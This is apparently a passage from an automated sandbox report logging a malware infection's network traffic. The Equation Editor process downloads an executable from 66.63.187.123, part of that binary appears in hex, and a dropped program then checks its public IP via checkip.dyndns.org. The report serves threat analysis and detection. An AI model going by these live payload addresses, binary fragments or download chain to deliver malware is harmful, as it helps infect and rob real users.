                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 66.63.187.123 Port 80</address></body></html>
                                                                                                            Sep 27, 2024 16:00:34.667280912 CEST163OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 74 78 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52
                                                                                                            Data Ascii: PROPFIND /txt HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 66.63.187.123
                                                                                                            Sep 27, 2024 16:00:34.903320074 CEST532INHTTP/1.1 301 Moved Permanently
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:34 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Content-Length: 312
                                                                                                            Connection: keep-alive
                                                                                                            Location: http://66.63.187.123/txt/
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 2f 74 78 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://66.63.187.123/txt/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 66.63.187.123 Port 80</address></body></html>
                                                                                                            Sep 27, 2024 16:00:34.903672934 CEST164OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 74 78 74 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69
                                                                                                            Data Ascii: PROPFIND /txt/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 66.63.187.123
                                                                                                            Sep 27, 2024 16:00:35.153430939 CEST518INHTTP/1.1 405 Method Not Allowed
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:35 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Content-Length: 304
                                                                                                            Connection: keep-alive
                                                                                                            Allow: OPTIONS,HEAD,GET,POST
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 36 36 2e 36 33 2e 31 38 37 2e 31 32 33 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 66.63.187.123 Port 80</address></body></html>
                                                                                                            Sep 27, 2024 16:00:40.746273041 CEST160OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69
                                                                                                            Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 66.63.187.123
                                                                                                            Sep 27, 2024 16:00:40.986650944 CEST1236INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:40 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: keep-alive
                                                                                                            Vary: Accept-Encoding
                                                                                                            Data Raw: 36 64 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 76 77 3b 0a 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 62 6f 78 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 20 27 3b 0a 20 20 20 20 20 20 20 20 20 20 62 6f [TRUNCATED]
                                                                                                            Data Ascii: 6d23<!DOCTYPE html><html> <head> <meta name="robots" content="noindex,nofollow"> <style type="text/css"> html, body { margin: 0; } .box { width: 100vw; height: 100vh; background-color: white; } .box:after { content: ' '; border-bottom: 100vh solid #F3F7FC; border-left: 100vw solid transparent; width: 0; position: absolute; } .image { z-index: 1; border-radius: 15px; width: 800px; left: 50%; margin-left: -400px; position: absolute; top: 50%; transform: translateY(-50%); } #hostname { position: absolute; left: 24%; top: 24%; font-family: 'Roboto'; font-style: normal; font-weight: 400; font-size: 24px; line-height: 30px; color [TRUNCATED]
                                                                                                            Sep 27, 2024 16:00:40.986684084 CEST1236INData Raw: 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 27 69 6d 61 67 65 27 3e 0a 3c 73 70 61 6e 20 69 64 3d 22 68 6f 73 74 6e 61 6d 65 22 3e 48 6f
                                                                                                            Data Ascii: e> </head><body><div class="box"><div class='image'><span id="hostname">Hostname.one</span><img src='data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iODAwIiBoZWlnaHQ9IjYwMCIgdmlld0JveD0iMCAwIDgwMCA2MDAiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d
                                                                                                            Sep 27, 2024 16:00:40.986696005 CEST448INData Raw: 4c 6a 63 77 4e 79 41 79 4e 6a 42 4d 4e 7a 49 77 4c 6a 55 67 4d 6a 51 77 4c 6a 49 77 4e 31 59 79 4d 7a 6b 75 4e 55 67 33 4d 6a 41 75 4d 6a 41 33 54 44 63 77 4d 43 34 33 4d 44 63 67 4d 6a 49 77 54 44 63 79 4d 43 34 31 49 44 49 77 4d 43 34 79 4d 44
                                                                                                            Data Ascii: LjcwNyAyNjBMNzIwLjUgMjQwLjIwN1YyMzkuNUg3MjAuMjA3TDcwMC43MDcgMjIwTDcyMC41IDIwMC4yMDdWMTk5LjVINzIwLjIwN0w3MDAuNzA3IDE4MEw3MjAuNSAxNjAuMjA3VjE1OS41SDcyMC4yMDdMNzAwLjcwNyAxNDBMNzIxLjIwNyAxMTkuNVpNNjgxLjIwNyAxMjAuNUg3MTguNzkzTDcwMCAxMzkuMjkzTDY4MS4
                                                                                                            Sep 27, 2024 16:00:40.987168074 CEST1236INData Raw: 4e 7a 45 34 4c 6a 63 35 4d 79 41 30 4d 7a 6b 75 4e 55 67 32 4f 44 45 75 4d 6a 41 33 54 44 63 77 4d 43 41 30 4d 6a 41 75 4e 7a 41 33 54 44 63 78 4f 43 34 33 4f 54 4d 67 4e 44 4d 35 4c 6a 56 61 54 54 63 77 4d 43 41 30 4d 54 6b 75 4d 6a 6b 7a 54 44
                                                                                                            Data Ascii: NzE4Ljc5MyA0MzkuNUg2ODEuMjA3TDcwMCA0MjAuNzA3TDcxOC43OTMgNDM5LjVaTTcwMCA0MTkuMjkzTDY4MS4yMDcgNDAwLjVINzE4Ljc5M0w3MDAgNDE5LjI5M1pNNzE4Ljc5MyAzOTkuNUg2ODEuMjA3TDcwMCAzODAuNzA3TDcxOC43OTMgMzk5LjVaTTcwMCAzNzkuMjkzTDY4MS4yMDcgMzYwLjVINzE4Ljc5M0w3MDA
                                                                                                            Sep 27, 2024 16:00:40.987214088 CEST224INData Raw: 54 44 63 79 4d 43 34 7a 4e 54 51 67 4d 43 34 7a 4e 54 4d 31 4d 54 5a 4d 4e 7a 49 77 49 44 42 49 4e 7a 45 35 4c 6a 49 35 4d 30 77 33 4d 44 41 67 4d 54 6b 75 4d 6a 6b 7a 54 44 59 34 4d 43 34 33 4d 44 63 67 4d 45 67 32 4f 44 42 4d 4e 6a 63 35 4c 6a
                                                                                                            Data Ascii: TDcyMC4zNTQgMC4zNTM1MTZMNzIwIDBINzE5LjI5M0w3MDAgMTkuMjkzTDY4MC43MDcgMEg2ODBMNjc5LjY0NiAwLjM1MzUxNkw2OTkuMjkzIDIwTDY3OS42NDYgMzkuNjQ2NUw2NjAgNTkuMjkzTDY0MC41IDM5Ljc5M1YzOS41SDYzOS43OTNMNjIwIDU5LjI5M0w2MDAuNSAzOS43OTNWMzkuNUg1
                                                                                                            Sep 27, 2024 16:00:40.987277985 CEST1236INData Raw: 4f 54 6b 75 4e 7a 6b 7a 54 44 55 34 4d 43 41 31 4f 53 34 79 4f 54 4e 4d 4e 54 55 35 4c 6a 6b 32 4e 43 41 7a 4f 53 34 79 4e 54 64 4d 4e 54 55 35 4c 6a 55 67 4d 7a 6b 75 4e 54 59 33 4e 6c 59 34 4d 43 34 31 53 44 55 32 4d 43 34 79 4d 44 64 4d 4e 54
                                                                                                            Data Ascii: OTkuNzkzTDU4MCA1OS4yOTNMNTU5Ljk2NCAzOS4yNTdMNTU5LjUgMzkuNTY3NlY4MC41SDU2MC4yMDdMNTgwIDYwLjcwN0w1OTkuNzkzIDgwLjVINjAwLjVWODAuMjA3TDYyMCA2MC43MDdMNjM5Ljc5MyA4MC41SDY0MC41VjgwLjIwN0w2NjAgNjAuNzA3TDY3OS41IDgwLjIwN1Y4MS4yMDdMNzAwIDYwLjcwN0w3MjAuNSA
                                                                                                            Sep 27, 2024 16:00:45.158360958 CEST1236INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:45 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: keep-alive
                                                                                                            Vary: Accept-Encoding
                                                                                                            Data Raw: 36 64 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 76 77 3b 0a 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 62 6f 78 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 20 27 3b 0a 20 20 20 20 20 20 20 20 20 20 62 6f [TRUNCATED]
                                                                                                            Data Ascii: 6d23<!DOCTYPE html><html> <head> <meta name="robots" content="noindex,nofollow"> <style type="text/css"> html, body { margin: 0; } .box { width: 100vw; height: 100vh; background-color: white; } .box:after { content: ' '; border-bottom: 100vh solid #F3F7FC; border-left: 100vw solid transparent; width: 0; position: absolute; } .image { z-index: 1; border-radius: 15px; width: 800px; left: 50%; margin-left: -400px; position: absolute; top: 50%; transform: translateY(-50%); } #hostname { position: absolute; left: 24%; top: 24%; font-family: 'Roboto'; font-style: normal; font-weight: 400; font-size: 24px; line-height: 30px; color [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.224916666.63.187.123803772C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Sep 27, 2024 16:00:37.131294966 CEST323OUTGET /txt/H363BpKqz0MdVd7.exe HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                            Host: 66.63.187.123
                                                                                                            Connection: Keep-Alive
                                                                                                            Sep 27, 2024 16:00:37.892034054 CEST1236INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.26.2
                                                                                                            Date: Fri, 27 Sep 2024 14:00:37 GMT
                                                                                                            Content-Type: application/x-msdos-program
                                                                                                            Content-Length: 673280
                                                                                                            Connection: keep-alive
                                                                                                            Last-Modified: Fri, 27 Sep 2024 03:14:38 GMT
                                                                                                            ETag: "a4600-6231141618562"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 77 22 f6 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 0a 00 00 08 00 00 00 00 00 00 ee 5a 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 5a 0a 00 57 00 00 00 00 60 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELw"f<Z @ @ZW` H.text: < `.rsrc`>@@.relocD@BZH\8?.0A p%9(: V%F(G(/*&*{*"}*0h%rp%rp%rp%rp%rp%rp%rp%rp%rp%rp}+(*6(/*&*0~G+>E`E5E`E&+G Y+aYaE++ [+
                                                                                                            Sep 27, 2024 16:00:37.892139912 CEST224INData Raw: 1b 03 8c 02 00 00 1b 6f 06 00 00 0a 0b 1f 09 13 05 38 6d ff ff ff 06 17 58 0a 20 12 05 00 00 0c 20 cc 01 00 00 0d 20 89 02 00 00 08 18 5b 09 59 32 08 1b 13 05 38 49 ff ff ff 1e 2b f6 07 2a 1e 13 05 38 3c ff ff ff 00 00 00 13 30 06 00 de 00 00 00
                                                                                                            Data Ascii: o8mX [Y28I+*8<0~:EM[HM~e~+a'Y~G ~G X_aE [Y+++
                                                                                                            Sep 27, 2024 16:00:37.892151117 CEST1236INData Raw: 05 6f 07 00 00 0a 06 17 58 0a 20 80 04 00 00 0b 17 0c 20 20 01 00 00 07 1a 5b 08 59 32 08 1b 13 04 38 5a ff ff ff 16 2b f6 2a 17 13 07 11 07 45 05 00 00 00 07 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 07 00 00 00 d0 07 00 00 06 26 2a 38 5e ff
                                                                                                            Data Ascii: oX [Y28Z+*E&*8^0~G~:+LEHmqY& WY++aYaE [+ VY+
                                                                                                            Sep 27, 2024 16:00:37.892163038 CEST224INData Raw: 9c 2a 41 1c 00 00 02 00 00 00 1a 00 00 00 17 01 00 00 31 01 00 00 31 00 00 00 00 00 00 00 13 30 06 00 c6 02 00 00 06 00 00 11 7e 3a 00 00 04 13 07 7e 47 00 00 04 13 08 16 13 06 11 06 45 11 00 00 00 00 00 00 00 00 00 00 00 24 02 00 00 ca 00 00 00
                                                                                                            Data Ascii: *A110~:~GE$is1YT:$(L,++rpr?p(& +{(M,8i PY+
                                                                                                            Sep 27, 2024 16:00:37.892174006 CEST1236INData Raw: 72 4d 00 00 70 72 3f 00 00 70 28 16 00 00 0a 26 00 1b 13 06 38 42 ff ff ff 02 7b 03 00 00 04 02 7b 0a 00 00 04 6f 17 00 00 0a 28 4e 00 00 06 0c 08 7e 47 00 00 04 20 07 01 00 00 7e 47 00 00 04 20 07 01 00 00 91 7e 47 00 00 04 20 b0 00 00 00 91 60
                                                                                                            Data Ascii: rMpr?p(&8B{{o(N~G ~G ~G `z_, Y8+rypr?p(&8{oo28+{oo+, Y8+rpr?p(&
                                                                                                            Sep 27, 2024 16:00:37.892215014 CEST1236INData Raw: 1c 00 00 0a 26 1f 0b 13 0a 38 5d fd ff ff 00 72 1f 01 00 70 72 3f 00 00 70 28 16 00 00 0a 26 11 0c 1f 4e 91 1f 09 5b 13 0a 38 3d fd ff ff 12 01 28 12 00 00 0a 2d 09 1f 0b 13 0a 38 2b fd ff ff 19 2b f6 de 31 2b 00 19 13 0e 11 0e 45 05 00 00 00 10
                                                                                                            Data Ascii: &8]rpr?p(&N[8=(-8++1+E+o+E+*A1&(%*0~:E+
                                                                                                            Sep 27, 2024 16:00:37.892225981 CEST1236INData Raw: 50 73 37 00 00 0a 6f 38 00 00 0a 00 02 7b 06 00 00 04 17 6f 39 00 00 0a 1f 16 13 08 38 77 fc ff ff 00 02 7b 06 00 00 04 72 9f 01 00 70 6f 3a 00 00 0a 00 02 7b 06 00 00 04 18 6f 3b 00 00 0a 1c 13 08 38 51 fc ff ff 00 02 7b 06 00 00 04 20 14 01 00
                                                                                                            Data Ascii: Ps7o8{o98w{rpo:{o;8Q{ fs<o={o>.8 {(4o5{o68{ Ps7o8{o9$8{rpo:{o;Y
                                                                                                            Sep 27, 2024 16:00:37.892329931 CEST672INData Raw: 02 7b 0c 00 00 04 1c 6f 3e 00 00 0a 00 02 7b 0c 00 00 04 72 c7 02 00 70 6f 0b 00 00 0a 11 0a 20 4a 01 00 00 91 13 08 38 98 f7 ff ff 00 02 7b 0d 00 00 04 16 6f 36 00 00 0a 00 02 7b 0d 00 00 04 1a 6f 45 00 00 0a 1f 36 13 08 38 75 f7 ff ff 00 02 7b
                                                                                                            Data Ascii: {o>{rpo J8{o6{oE68u{H s7o8{rpo:+UY8={Is<o={o> gY8{o6{oE8{C )s7o8
                                                                                                            Sep 27, 2024 16:00:37.892411947 CEST1236INData Raw: 00 0a 6f 3d 00 00 0a 1f 35 13 08 38 14 f5 ff ff 00 02 7b 10 00 00 04 1f 0a 6f 3e 00 00 0a 00 02 7b 10 00 00 04 72 29 03 00 70 6f 0b 00 00 0a 11 0a 20 43 02 00 00 91 11 0a 20 f6 00 00 00 91 59 13 08 38 dd f4 ff ff 00 02 7b 10 00 00 04 16 6f 4a 00
                                                                                                            Data Ascii: o=58{o>{r)po C Y8{oJ{sKoL s Y8{(Fo5{oG(FoM 8s{oGoH{oI"8K{s os7o8
                                                                                                            Sep 27, 2024 16:00:37.892422915 CEST1236INData Raw: 00 0a 6f 38 00 00 0a 11 09 18 91 1f 2a 59 13 08 38 3b f0 ff ff 00 02 7b 14 00 00 04 72 e1 03 00 70 6f 3a 00 00 0a 00 02 7b 14 00 00 04 20 e4 00 00 00 1f 19 73 3c 00 00 0a 6f 3d 00 00 0a 11 0a 20 c2 00 00 00 91 1f 2e 58 13 08 38 00 f0 ff ff 00 02
                                                                                                            Data Ascii: o8*Y8;{rpo:{ s<o= .X8{o>{rpo B{Y8"@"PAsZ([(\&8%.;(So5 s<(]8x(N{oO(N{
                                                                                                            Sep 27, 2024 16:00:37.897109032 CEST1236INData Raw: 13 0b 38 40 fe ff ff 00 1d 13 0b 38 37 fe ff ff 00 11 0d 20 bf 00 00 00 91 20 e7 00 00 00 59 13 0b 38 21 fe ff ff 00 07 17 58 0b 1f 11 13 0b 38 13 fe ff ff 07 02 6f 68 00 00 0a fe 04 13 08 11 08 2d 12 11 0d 20 fb 00 00 00 91 1f 6f 59 13 0b 38 f2
                                                                                                            Data Ascii: 8@87 Y8!X8oh- oY8 +X CY8oi-g Y8+~: ~G\*0LE .!(goe(foe


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.2249167158.101.44.242803952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Sep 27, 2024 16:00:45.591738939 CEST151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Sep 27, 2024 16:00:48.083055973 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:48 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 16d738824beb3a5408d080e8f13f0ce2
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                                            Sep 27, 2024 16:00:48.291662931 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:48 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 16d738824beb3a5408d080e8f13f0ce2
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                                            Sep 27, 2024 16:00:48.805161953 CEST127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Sep 27, 2024 16:00:49.183049917 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:49 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 9f51d06cee96e2199ce51eca5b0c5f46
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                                            Sep 27, 2024 16:00:49.391602993 CEST320INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:49 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 103
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            X-Request-ID: 9f51d06cee96e2199ce51eca5b0c5f46
